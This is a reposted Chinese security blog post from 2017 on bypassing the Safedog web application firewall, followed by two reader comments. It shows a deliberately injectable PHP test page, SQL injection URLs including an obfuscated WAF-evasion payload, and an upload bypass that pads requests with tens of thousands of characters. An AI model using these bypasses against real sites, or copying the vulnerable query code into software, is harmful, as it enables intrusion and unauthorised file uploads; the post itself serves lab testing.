安全狗SQL注入、上传绕过-2017-3-23

热度:2236℃ 评论:3 发布时间:2017-04-20 收录:已收录

作者是谁不清楚,看到群里分享出来的,所以转载到博客了。-----收集整理 by: www.nvhack.com

安全狗SQL注入、上传绕过-2017-3-23

安全狗SQL注入绕过

  • 测试文件,明显的字符型 SQL 注入
<?php

header("Content-type: text/html; charset=utf-8"); $link = mysql_connect("localhost","root","root"); mysql_select_db("test",$link);

$sql = "select * from cms where id='{$_GET['id']}'"; echo $sql;

echo '<br>-----------------------------<br>'; $res = mysql_query($sql);

while ( $rows = mysql_fetch_array($res)) { echo $rows[0];

echo $rows[1]; echo $rows[2];

}

?>
  • 正常运行界面

安全狗SQL注入、上传绕过-2017-3-23

  • 添加注入测试语句
http://localhost/waf123.php?id=3' and 1=1 --+

安全狗SQL注入、上传绕过-2017-3-23

  • 修改测试语句
http://localhost/waf123.php?id=3'/*!and*/%202e1/**/=2e1--+

安全狗SQL注入、上传绕过-2017-3-23
安全狗SQL注入、上传绕过-2017-3-23
安全狗SQL注入、上传绕过-2017-3-23

安全狗上传绕过

  • 附上 php 上传脚本源码,此源码未对上传文件类型做校验

安全狗SQL注入、上传绕过-2017-3-23
安全狗SQL注入、上传绕过-2017-3-23

  • 绕过方法,工具:burpsuite 1,用 php 脚本或者 js,python 等其他语言,生成 48930 个字符
<?php

for ($i=0; $i <= 48930; $i++) { echo 'o';
}

?>
  • 抓包,改包

安全狗SQL注入、上传绕过-2017-3-23

  • 添加后如图

安全狗SQL注入、上传绕过-2017-3-23

  • 查看当前目录,上传成功 1

安全狗SQL注入、上传绕过-2017-3-23

打赏
本文由 Mr.Wu 创作,除注明转载/出处外,均为本站原创,转载前请注明出处!

3条回应:“安全狗SQL注入、上传绕过-2017-3-23”

  1. shang说道:

    那条注入语句中,2e1是什么意思呀。。

  2. 我得天说道:

    感谢分享,这个不错

发表评论

电子邮件地址不会被公开。 必填项已用*标注

顶部
护眼
搜索
分享